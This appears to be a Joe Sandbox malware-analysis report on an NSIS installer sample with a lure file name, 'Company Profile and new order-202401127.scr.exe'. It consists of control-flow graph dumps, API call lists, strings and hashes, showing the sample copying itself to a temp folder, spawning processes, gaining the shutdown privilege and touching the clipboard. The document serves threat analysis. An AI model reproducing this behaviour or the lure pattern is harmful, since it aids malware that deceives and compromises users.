406857 CharPrevW 3267 406852 3263->3267 3264 406845 CharNextW 3264->3267 3264->3269 3265 406878 3265->3241 3267->3263 3267->3265 3268 406831 CharNextW 3268->3269 3269->3264 3269->3267 3269->3268 3270 406840 CharNextW 3269->3270 3281 405e1d 3269->3281 3270->3264 3271->3241 3272->3241 3273->3228 3275 40639d 3274->3275 3276 4063a1 3275->3276 3277 4063a6 RegOpenKeyExW 3275->3277 3276->3254 3276->3255 3277->3276 3279 4068c7 wsprintfW LoadLibraryExW 3278->3279 3279->3261 3282 405e23 3281->3282 3283 405e39 3282->3283 3284 405e2a CharNextW 3282->3284 3283->3269 3284->3282 3301 403fa1 3302 403fb9 3301->3302 3303 40411a 3301->3303 3302->3303 3304 403fc5 3302->3304 3305 
40412b GetDlgItem GetDlgItem 3303->3305 3310 40416b 3303->3310 3307 403fd0 SetWindowPos 3304->3307 3308 403fe3 3304->3308 3309 4044a0 22 API calls 3305->3309 3306 4041c5 3366 404115 3306->3366 3374 4044ec 3306->3374 3307->3308 3312 403fec ShowWindow 3308->3312 3313 40402e 3308->3313 3314 404155 SetClassLongW 3309->3314 3310->3306 3315 401389 2 API calls 3310->3315 3316 404107 3312->3316 3317 40400c GetWindowLongW 3312->3317 3318 404036 DestroyWindow 3313->3318 3319 40404d 3313->3319 3320 40140b 2 API calls 3314->3320 3323 40419d 3315->3323 3396 404507 3316->3396 3317->3316 3325 404025 ShowWindow 3317->3325 3329 404429 3318->3329 3321 404052 SetWindowLongW 3319->3321 3322 404063 3319->3322 3320->3310 3321->3366 3322->3316 3326 40406f GetDlgItem 3322->3326 3323->3306 3327 4041a1 SendMessageW 3323->3327 3325->3313 3331 404080 SendMessageW IsWindowEnabled 3326->3331 3332 40409d 3326->3332 3327->3366 3328 40140b 2 API calls 3345 4041d7 3328->3345 3333 40445a ShowWindow 3329->3333 3329->3366 3330 40442b DestroyWindow EndDialog 3330->3329 3331->3332 3331->3366 3335 4040aa 3332->3335 3337 4040f1 SendMessageW 3332->3337 3338 4040bd 3332->3338 3347 4040a2 3332->3347 3333->3366 3334 40655e 21 API calls 3334->3345 3335->3337 3335->3347 3337->3316 3340 4040c5 3338->3340 3341 4040da 3338->3341 3339 4040d8 3339->3316 3390 40140b 3340->3390 3343 40140b 2 API calls 3341->3343 3342 4044a0 22 API calls 3342->3345 3346 4040e1 3343->3346 3345->3328 3345->3330 3345->3334 3345->3342 3364 40436b DestroyWindow 3345->3364 3345->3366 3377 4044a0 3345->3377 3346->3316 3346->3347 3393 404479 3347->3393 3349 404252 GetDlgItem 3350 404267 3349->3350 3351 40426f ShowWindow KiUserCallbackDispatcher 3349->3351 3350->3351 3380 4044c2 KiUserCallbackDispatcher 3351->3380 3353 404299 EnableWindow 3358 4042ad 3353->3358 3354 4042b2 GetSystemMenu EnableMenuItem SendMessageW 3355 4042e2 SendMessageW 3354->3355 3354->3358 3355->3358 3358->3354 3381 4044d5 SendMessageW 3358->3381 3382 403f82 3358->3382 3385 
406521 lstrcpynW 3358->3385 3360 404311 lstrlenW 3361 40655e 21 API calls 3360->3361 3362 404327 SetWindowTextW 3361->3362 3386 401389 3362->3386 3364->3329 3365 404385 CreateDialogParamW 3364->3365 3365->3329 3367 4043b8 3365->3367 3368 4044a0 22 API calls 3367->3368 3369 4043c3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3368->3369 3370 401389 2 API calls 3369->3370 3371 404409 3370->3371 3371->3366 3372 404411 ShowWindow 3371->3372 3373 4044ec SendMessageW 3372->3373 3373->3329 3375 404504 3374->3375 3376 4044f5 SendMessageW 3374->3376 3375->3345 3376->3375 3378 40655e 21 API calls 3377->3378 3379 4044ab SetDlgItemTextW 3378->3379 3379->3349 3380->3353 3381->3358 3383 40655e 21 API calls 3382->3383 3384 403f90 SetWindowTextW 3383->3384 3384->3358 3385->3360 3388 401390 3386->3388 3387 4013fe 3387->3345 3388->3387 3389 4013cb MulDiv SendMessageW 3388->3389 3389->3388 3391 401389 2 API calls 3390->3391 3392 401420 3391->3392 3392->3347 3394 404480 3393->3394 3395 404486 SendMessageW 3393->3395 3394->3395 3395->3339 3397 4045ca 3396->3397 3398 40451f GetWindowLongW 3396->3398 3397->3366 3398->3397 3399 404534 3398->3399 3399->3397 3400 404561 GetSysColor 3399->3400 3401 404564 3399->3401 3400->3401 3402 404574 SetBkMode 3401->3402 3403 40456a SetTextColor 3401->3403 3404 404592 3402->3404 3405 40458c GetSysColor 3402->3405 3403->3402 3406 4045a3 3404->3406 3407 404599 SetBkColor 3404->3407 3405->3404 3406->3397 3408 4045b6 DeleteObject 3406->3408 3409 4045bd CreateBrushIndirect 3406->3409 3407->3406 3408->3409 3409->3397 4669 402621 4670 402dab 21 API calls 4669->4670 4671 402628 4670->4671 4674 406011 GetFileAttributesW CreateFileW 4671->4674 4673 402634 4674->4673 4682 4025a3 4692 402deb 4682->4692 4685 402d89 21 API calls 4686 4025b6 4685->4686 4687 402933 4686->4687 4688 4025d2 RegEnumKeyW 4686->4688 4689 4025de RegEnumValueW 4686->4689 4690 4025f3 RegCloseKey 4688->4690 4689->4690 4690->4687 4693 402dab 21 API calls 4692->4693 4694 402e02 4693->4694 
4695 40638e RegOpenKeyExW 4694->4695 4696 4025ad 4695->4696 4696->4685 4697 4015a8 4698 402dab 21 API calls 4697->4698 4699 4015af SetFileAttributesW 4698->4699 4700 4015c1 4699->4700 3742 401fa9 3743 402dab 21 API calls 3742->3743 3744 401faf 3743->3744 3745 4055a6 28 API calls 3744->3745 3746 401fb9 3745->3746 3757 405b04 CreateProcessW 3746->3757 3749 401fe2 CloseHandle 3752 402933 3749->3752 3753 401fd4 3754 401fe4 3753->3754 3755 401fd9 3753->3755 3754->3749 3765 406468 wsprintfW 3755->3765 3758 401fbf 3757->3758 3759 405b37 CloseHandle 3757->3759 3758->3749 3758->3752 3760 4069c0 WaitForSingleObject 3758->3760 3759->3758 3761 4069da 3760->3761 3762 4069ec GetExitCodeProcess 3761->3762 3766 406951 3761->3766 3762->3753 3765->3749 3767 40696e PeekMessageW 3766->3767 3768 406964 DispatchMessageW 3767->3768 3769 40697e WaitForSingleObject 3767->3769 3768->3767 3769->3761 4701 40202f 4702 402dab 21 API calls 4701->4702 4703 402036 4702->4703 4704 406915 5 API calls 4703->4704 4705 402045 4704->4705 4706 402061 GlobalAlloc 4705->4706 4707 4020d1 4705->4707 4706->4707 4708 402075 4706->4708 4709 406915 5 API calls 4708->4709 4710 40207c 4709->4710 4711 406915 5 API calls 4710->4711 4712 402086 4711->4712 4712->4707 4716 406468 wsprintfW 4712->4716 4714 4020bf 4717 406468 wsprintfW 4714->4717 4716->4714 4717->4707 4718 40252f 4719 402deb 21 API calls 4718->4719 4720 402539 4719->4720 4721 402dab 21 API calls 4720->4721 4722 402542 4721->4722 4723 40254d RegQueryValueExW 4722->4723 4725 402933 4722->4725 4724 40256d 4723->4724 4726 402573 RegCloseKey 4723->4726 4724->4726 4729 406468 wsprintfW 4724->4729 4726->4725 4729->4726 4730 4021af 4731 402dab 21 API calls 4730->4731 4732 4021b6 4731->4732 4733 402dab 21 API calls 4732->4733 4734 4021c0 4733->4734 4735 402dab 21 API calls 4734->4735 4736 4021ca 4735->4736 4737 402dab 21 API calls 4736->4737 4738 4021d4 4737->4738 4739 402dab 21 API calls 4738->4739 4740 4021de 4739->4740 4741 40221d CoCreateInstance 4740->4741 
4742 402dab 21 API calls 4740->4742 4745 40223c 4741->4745 4742->4741 4743 401423 28 API calls 4744 4022fb 4743->4744 4745->4743 4745->4744 4746 403bb1 4747 403bbc 4746->4747 4748 403bc0 4747->4748 4749 403bc3 GlobalAlloc 4747->4749 4749->4748 4757 401a35 4758 402dab 21 API calls 4757->4758 4759 401a3e ExpandEnvironmentStringsW 4758->4759 4760 401a52 4759->4760 4761 401a65 4759->4761 4760->4761 4762 401a57 lstrcmpW 4760->4762 4762->4761 3727 4023b7 3728 4023bf 3727->3728 3733 4023c5 3727->3733 3729 402dab 21 API calls 3728->3729 3729->3733 3730 402dab 21 API calls 3732 4023d3 3730->3732 3731 4023e1 3735 402dab 21 API calls 3731->3735 3732->3731 3734 402dab 21 API calls 3732->3734 3733->3730 3733->3732 3734->3731 3736 4023ea WritePrivateProfileStringW 3735->3736 4768 4014b8 4769 4014be 4768->4769 4770 401389 2 API calls 4769->4770 4771 4014c6 4770->4771 4772 402439 4773 402441 4772->4773 4774 40246c 4772->4774 4776 402deb 21 API calls 4773->4776 4775 402dab 21 API calls 4774->4775 4778 402473 4775->4778 4777 402448 4776->4777 4780 402dab 21 API calls 4777->4780 4782 402480 4777->4782 4783 402e69 4778->4783 4781 402459 RegDeleteValueW RegCloseKey 4780->4781 4781->4782 4784 402e7d 4783->4784 4786 402e76 4783->4786 4784->4786 4787 402eae 4784->4787 4786->4782 4788 40638e RegOpenKeyExW 4787->4788 4789 402edc 4788->4789 4790 402eec RegEnumValueW 4789->4790 4791 402f0f 4789->4791 4798 402f86 4789->4798 4790->4791 4792 402f76 RegCloseKey 4790->4792 4791->4792 4793 402f4b RegEnumKeyW 4791->4793 4794 402f54 RegCloseKey 4791->4794 4796 402eae 6 API calls 4791->4796 4792->4798 4793->4791 4793->4794 4795 406915 5 API calls 4794->4795 4797 402f64 4795->4797 4796->4791 4797->4798 4799 402f68 RegDeleteKeyW 4797->4799 4798->4786 4799->4798 4800 40173a 4801 402dab 21 API calls 4800->4801 4802 401741 SearchPathW 4801->4802 4803 40175c 4802->4803 4804 401d3d 4805 402d89 21 API calls 4804->4805 4806 401d44 4805->4806 4807 402d89 21 API calls 4806->4807 4808 401d50 GetDlgItem 4807->4808 
4809 40263d 4808->4809 4810 406c3f 4812 406ac3 4810->4812 4811 40742e 4812->4811 4813 406b44 GlobalFree 4812->4813 4814 406b4d GlobalAlloc 4812->4814 4815 406bc4 GlobalAlloc 4812->4815 4816 406bbb GlobalFree 4812->4816 4813->4814 4814->4811 4814->4812 4815->4811 4815->4812 4816->4815

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE ref: 0040351F
                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
                                                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
                                                                                            • OleInitialize.OLE32(00000000), ref: 0040363A
                                                                                            • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
                                                                                            • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",00000020,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036A7
                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FC
                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403818
                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
                                                                                            • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
                                                                                              • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                            • wsprintfW.USER32 ref: 0040397B
                                                                                            • GetFileAttributesW.KERNEL32( ",C:\Users\user\AppData\Local\Temp\), ref: 004039AE
                                                                                            • DeleteFileW.KERNEL32( "), ref: 004039BA
                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                                                                              • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB
                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe, ",00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
                                                                                              • Part of subcall function 00405B04: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?, ",?), ref: 00405B2D
                                                                                              • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?, ",?), ref: 00405B3A
                                                                                              • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(75923420,00425F58,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                              • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                            • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
                                                                                            • ExitProcess.KERNEL32 ref: 00403A69
                                                                                            • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?, ",00000000), ref: 00403A70
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                                                            • ExitProcess.KERNEL32 ref: 00403B13
                                                                                              • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                            • String ID: "$"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nonopposable\ff4$C:\Users\user\AppData\Local\Temp\nonopposable\ff4$C:\Users\user\Desktop$C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                            • API String ID: 1813718867-74311805
                                                                                            • Opcode ID: 29aa30fcb600f5c8a5383c7116afafb794e17da889116137ed8fec584551b587
                                                                                            • Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
                                                                                            • Opcode Fuzzy Hash: 29aa30fcb600f5c8a5383c7116afafb794e17da889116137ed8fec584551b587
                                                                                            • Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 151 4056e5-405700 152 405706-4057cd GetDlgItem * 3 call 4044d5 call 404e2e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 40588f-405896 151->153 171 4057eb-4057ee 152->171 172 4057cf-4057e9 SendMessageW * 2 152->172 155 4058c0-4058cd 153->155 156 405898-4058ba GetDlgItem CreateThread CloseHandle 153->156 157 4058eb-4058f5 155->157 158 4058cf-4058d5 155->158 156->155 162 4058f7-4058fd 157->162 163 40594b-40594f 157->163 160 405910-405919 call 404507 158->160 161 4058d7-4058e6 ShowWindow * 2 call 4044d5 158->161 175 40591e-405922 160->175 161->157 168 405925-405935 ShowWindow 162->168 169 4058ff-40590b call 404479 162->169 163->160 166 405951-405957 163->166 166->160 173 405959-40596c SendMessageW 166->173 176 405945-405946 call 404479 168->176 177 405937-405940 call 4055a6 168->177 169->160 178 4057f0-4057fc SendMessageW 171->178 179 4057fe-405815 call 4044a0 171->179 172->171 180 405972-40599d CreatePopupMenu call 40655e AppendMenuW 173->180 181 405a6e-405a70 173->181 176->163 177->176 178->179 190 405817-40582b ShowWindow 179->190 191 40584b-40586c GetDlgItem SendMessageW 179->191 188 4059b2-4059c7 TrackPopupMenu 180->188 189 40599f-4059af GetWindowRect 180->189 181->175 188->181 192 4059cd-4059e4 188->192 189->188 193 40583a 190->193 194 40582d-405838 ShowWindow 190->194 191->181 195 405872-40588a SendMessageW * 2 191->195 196 4059e9-405a04 SendMessageW 192->196 197 405840-405846 call 4044d5 193->197 194->197 195->181 196->196 198 405a06-405a29 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a2b-405a52 SendMessageW 198->200 200->200 201 405a54-405a68 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->181
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405743
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405752
                                                                                            • GetClientRect.USER32(?,?), ref: 0040578F
                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405796
                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405832
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405853
                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405761
                                                                                              • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004058BA
                                                                                            • ShowWindow.USER32(00000000), ref: 004058DE
                                                                                            • ShowWindow.USER32(?,00000008), ref: 004058E3
                                                                                            • ShowWindow.USER32(00000008), ref: 0040592D
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                                                                                            • CreatePopupMenu.USER32 ref: 00405972
                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                                                                                            • GetWindowRect.USER32(?,?), ref: 004059A6
                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                                                                                            • OpenClipboard.USER32(00000000), ref: 00405A07
                                                                                            • EmptyClipboard.USER32 ref: 00405A0D
                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405A23
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                                                                                            • CloseClipboard.USER32 ref: 00405A68
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                            • String ID: {
                                                                                            • API String ID: 590372296-366298937
                                                                                            • Opcode ID: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                                                            • Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
                                                                                            • Opcode Fuzzy Hash: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                                                            • Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 509 405c2d-405c53 call 405ef8 512 405c55-405c67 DeleteFileW 509->512 513 405c6c-405c73 509->513 514 405de9-405ded 512->514 515 405c75-405c77 513->515 516 405c86-405c96 call 406521 513->516 517 405d97-405d9c 515->517 518 405c7d-405c80 515->518 522 405ca5-405ca6 call 405e3c 516->522 523 405c98-405ca3 lstrcatW 516->523 517->514 521 405d9e-405da1 517->521 518->516 518->517 524 405da3-405da9 521->524 525 405dab-405db3 call 40687e 521->525 526 405cab-405caf 522->526 523->526 524->514 525->514 532 405db5-405dc9 call 405df0 call 405be5 525->532 529 405cb1-405cb9 526->529 530 405cbb-405cc1 lstrcatW 526->530 529->530 533 405cc6-405ce2 lstrlenW FindFirstFileW 529->533 530->533 549 405de1-405de4 call 4055a6 532->549 550 405dcb-405dce 532->550 535 405ce8-405cf0 533->535 536 405d8c-405d90 533->536 537 405d10-405d24 call 406521 535->537 538 405cf2-405cfa 535->538 536->517 540 405d92 536->540 551 405d26-405d2e 537->551 552 405d3b-405d46 call 405be5 537->552 541 405cfc-405d04 538->541 542 405d6f-405d7f FindNextFileW 538->542 540->517 541->537 545 405d06-405d0e 541->545 542->535 548 405d85-405d86 FindClose 542->548 545->537 545->542 548->536 549->514 550->524 553 405dd0-405ddf call 4055a6 call 4062e1 550->553 551->542 554 405d30-405d39 call 405c2d 551->554 562 405d67-405d6a call 4055a6 552->562 563 405d48-405d4b 552->563 553->514 554->542 562->542 566 405d4d-405d5d call 4055a6 call 4062e1 563->566 567 405d5f-405d65 563->567 566->542 567->542
                                                                                            APIs
                                                                                            • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405C56
                                                                                            • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405C9E
                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405CC1
                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405CC7
                                                                                            • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405CD7
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
                                                                                            • FindClose.KERNEL32(00000000), ref: 00405D86
                                                                                            Strings
                                                                                            • \*.*, xrefs: 00405C98
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C3A
                                                                                            • "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe", xrefs: 00405C36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
